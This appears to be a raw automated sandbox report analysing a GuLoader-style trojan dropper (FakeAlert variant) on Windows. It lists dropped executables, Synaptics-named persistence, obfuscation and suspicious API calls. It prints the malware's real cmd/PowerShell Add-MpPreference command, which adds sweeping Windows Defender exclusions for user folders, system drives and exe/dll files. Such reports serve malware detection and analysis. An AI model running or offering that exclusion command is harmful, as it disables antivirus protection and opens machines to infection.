Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0043F118 NtdllDefWindowProc_A,GetCapture,	6_2_0043F118
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_004598AC NtdllDefWindowProc_A,	6_2_004598AC
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	6_2_0045A054
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	6_2_0045A104
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0045E9EC SHGetPathFromIDList,SHGetPathFromIDList,NtdllDefWindowProc_A,	6_2_0045E9EC
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0044EA40 GetSubMenu,SaveDC,RestoreDC,73C9B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,	6_2_0044EA40
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0042F60C NtdllDefWindowProc_A,	6_2_0042F60C
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_0043F118 NtdllDefWindowProc_A,GetCapture,	9_2_0043F118
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_004598AC NtdllDefWindowProc_A,	9_2_004598AC
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	9_2_0045A054
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	9_2_0045A104
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_0045E9EC SHGetPathFromIDList,SHGetPathFromIDList,NtdllDefWindowProc_A,	9_2_0045E9EC
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_0044EA40 GetSubMenu,SaveDC,RestoreDC,73C9B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,	9_2_0044EA40
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_0042F60C NtdllDefWindowProc_A,	9_2_0042F60C
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_0043F118 NtdllDefWindowProc_A,GetCapture,	12_2_0043F118
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_004598AC NtdllDefWindowProc_A,	12_2_004598AC
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	12_2_0045A054
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	12_2_0045A104
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_0045E9EC SHGetPathFromIDList,SHGetPathFromIDList,NtdllDefWindowProc_A,	12_2_0045E9EC
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_0044EA40 GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,	12_2_0044EA40
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_0042F60C NtdllDefWindowProc_A,	12_2_0042F60C

PE file contains executable resources (Code or Archives)

Source: uniformerede.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Source: uniformerede.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Source: uniformerede.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: Synaptics.exe.6.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Source: Synaptics.exe.6.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Source: Synaptics.exe.6.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: RCXCD96.tmp.6.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: YC9w8Aif.exe.9.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: RCXDA77.tmp.9.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: RCXDA77.tmp.9.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: RCXF979.tmp.9.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: RCXF979.tmp.9.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: ~$cache1.9.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

Sample file is different than original file name gathered from version info

Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs SecuriteInfo.com.Variant.FakeAlert.2.24488.exe
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameb! vs SecuriteInfo.com.Variant.FakeAlert.2.24488.exe
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.dr	Binary or memory string: OriginalFileName vs SecuriteInfo.com.Variant.FakeAlert.2.24488.exe
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.dr	Binary or memory string: OriginalFilenameb! vs SecuriteInfo.com.Variant.FakeAlert.2.24488.exe

Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20220527

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@21/60@6/2

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe

Code function: 6_2_00425FB8 GetLastError,FormatMessageA,

6_2_00425FB8

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe

Code function: 6_2_004747D8 FindResourceA,

6_2_004747D8

Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	Virustotal: Detection: 62%
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	ReversingLabs: Detection: 58%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe "C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c start "" "C:\Users\user\AppData\Local\Temp\uniformerede.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\uniformerede.exe "C:\Users\user\AppData\Local\Temp\uniformerede.exe"
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Process created: C:\Users\user\Desktop\._cache_uniformerede.exe "C:\Users\user\Desktop\._cache_uniformerede.exe"
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
Source: unknown	Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\ProgramData\Synaptics\Synaptics.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 2904
Source: C:\ProgramData\Synaptics\Synaptics.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 4052
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c start "" "C:\Users\user\AppData\Local\Temp\uniformerede.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\uniformerede.exe "C:\Users\user\AppData\Local\Temp\uniformerede.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Process created: C:\Users\user\Desktop\._cache_uniformerede.exe "C:\Users\user\Desktop\._cache_uniformerede.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00475958 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,GetLastError,	6_2_00475958
Source: C:\Users\user\Desktop\._cache_uniformerede.exe	Code function: 7_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,	7_2_00403640
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 9_2_00475958 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,GetLastError,	9_2_00475958
Source: C:\ProgramData\Synaptics\Synaptics.exe	Code function: 12_2_00475958 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,GetLastError,	12_2_00475958

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe

File created: C:\Users\user\AppData\Local\Temp\uniformerede.exe

Jump to behavior

Source: C:\Users\user\Desktop\._cache_uniformerede.exe

Code function: 7_2_004021AA CoCreateInstance,

7_2_004021AA

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe

Code function: 6_2_00409ED2 GetDiskFreeSpaceA,

6_2_00409ED2

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6356:120:WilError_01
Source: C:\ProgramData\Synaptics\Synaptics.exe	Mutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6300:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6620

Source: C:\Users\user\Desktop\._cache_uniformerede.exe

File written: C:\Users\user\AppData\Local\Temp\udfrielser.ini

Jump to behavior

Source: Yara match	File source: 12.0.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.Synaptics.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.Synaptics.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.Synaptics.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.uniformerede.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.uniformerede.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000000.270423175.0000000000401000.00000020.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.316350277.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.364281736.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.357173364.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.348826366.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.285408477.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.361096693.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.310907115.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\YC9w8Aif.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Synaptics\RCXCD96.tmp, type: DROPPED
Source: Yara match	File source: C:\Users\user\Documents\DUUDTUBZFW\~$cache1, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\uniformerede.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\RCXF979.tmp, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\RCXDA77.tmp, type: DROPPED

Source: C:\ProgramData\Synaptics\Synaptics.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Source: C:\Users\user\Desktop\._cache_uniformerede.exe

Registry value created: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\URBANITETENS

Jump to behavior

Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe

Static file information: File size 1490944 > 1048576

Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe

Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x136600

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000007.00000002.532970198.00000000030C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00446564 push 004465F1h; ret	6_2_004465E9
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00406B3C push 00406B8Dh; ret	6_2_00406B85
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00478CB0 push 00478D2Dh; ret	6_2_00478D25
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00422044 push ecx; mov dword ptr [esp], edx	6_2_00422049
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0042E010 push 0042E03Ch; ret	6_2_0042E034
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0046C0B0 push ecx; mov dword ptr [esp], eax	6_2_0046C0B2
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_004761F8 push 0047623Bh; ret	6_2_00476233
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0049419C push 004941CFh; ret	6_2_004941C7
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0042E1BC push 0042E1E8h; ret	6_2_0042E1E0
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00480210 push 0048023Ch; ret	6_2_00480234
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_004842DC push 00484308h; ret	6_2_00484300
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0048036C push 00480398h; ret	6_2_00480390
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0042C3D0 push 0042C3FCh; ret	6_2_0042C3F4
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00432468 push 004324B4h; ret	6_2_004324AC
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00486408 push 004864ADh; ret	6_2_004864A5
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0047C404 push 0047C430h; ret	6_2_0047C428
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00432404 push 00432447h; ret	6_2_0043243F
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_004324C0 push 0043250Bh; ret	6_2_00432503
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0042C4C4 push 0042C4F0h; ret	6_2_0042C4E8
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_004464FC push 00446562h; ret	6_2_0044655A
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00490554 push 00490580h; ret	6_2_00490578
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0047A514 push 0047A540h; ret	6_2_0047A538
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00432518 push 00432544h; ret	6_2_0043253C
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00496530 push 00496586h; ret	6_2_0049657E
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0048859C push 004885DEh; ret	6_2_004885D6
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00432650 push 004326C6h; ret	6_2_004326BE
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0049A6BC push 0049A745h; ret	6_2_0049A73D
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00480744 push 00480770h; ret	6_2_00480768
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0049A750 push 0049A776h; ret	6_2_0049A76E
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0048077C push 004807A8h; ret	6_2_004807A0
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0048477C push 004847A8h; ret	6_2_004847A0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe

Code function: 6_2_004730FC LoadLibraryA,GetProcAddress,SHGetSpecialFolderLocation,SHGetPathFromIDList,SHGetSpecialFolderLocation,SHGetPathFromIDList,

6_2_004730FC

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\ProgramData\Synaptics\Synaptics.exe

File created: C:\Users\user\Documents\DUUDTUBZFW\~$cache1

Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	File created: C:\ProgramData\Synaptics\Synaptics.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	File created: C:\ProgramData\Synaptics\RCXCD96.tmp			Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\ProgramData\Synaptics\Synaptics.exe

File created: C:\Users\user\Documents\DUUDTUBZFW\~$cache1

Jump to dropped file

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	File created: C:\Users\user\Desktop\._cache_uniformerede.exe	Jump to dropped file
Source: C:\ProgramData\Synaptics\Synaptics.exe	File created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	Jump to dropped file
Source: C:\ProgramData\Synaptics\Synaptics.exe	File created: C:\Users\user\AppData\Local\Temp\YC9w8Aif.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	File created: C:\ProgramData\Synaptics\Synaptics.exe	Jump to dropped file
Source: C:\Users\user\Desktop\._cache_uniformerede.exe	File created: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll	Jump to dropped file
Source: C:\ProgramData\Synaptics\Synaptics.exe	File created: C:\Users\user\Documents\DUUDTUBZFW\~$cache1	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe	File created: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Jump to dropped file
Source: C:\ProgramData\Synaptics\Synaptics.exe	File created: C:\Users\user\AppData\Local\Temp\RCXF979.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	File created: C:\ProgramData\Synaptics\RCXCD96.tmp	Jump to dropped file
Source: C:\ProgramData\Synaptics\Synaptics.exe	File created: C:\Users\user\AppData\Local\Temp\RCXDA77.tmp	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: download (31).png

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00459934 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	6_2_00459934
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	6_2_0045A054
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	6_2_0045A104
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0042C6FC IsIconic,GetWindowPlacement,GetWindowRect,	6_2_0042C6FC
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0044083C IsIconic,GetCapture,	6_2_0044083C
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_0045695C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	6_2_0045695C
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_004410F0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	6_2_004410F0
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe	Code function: 6_2_00441A14 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	6_2_00441A14
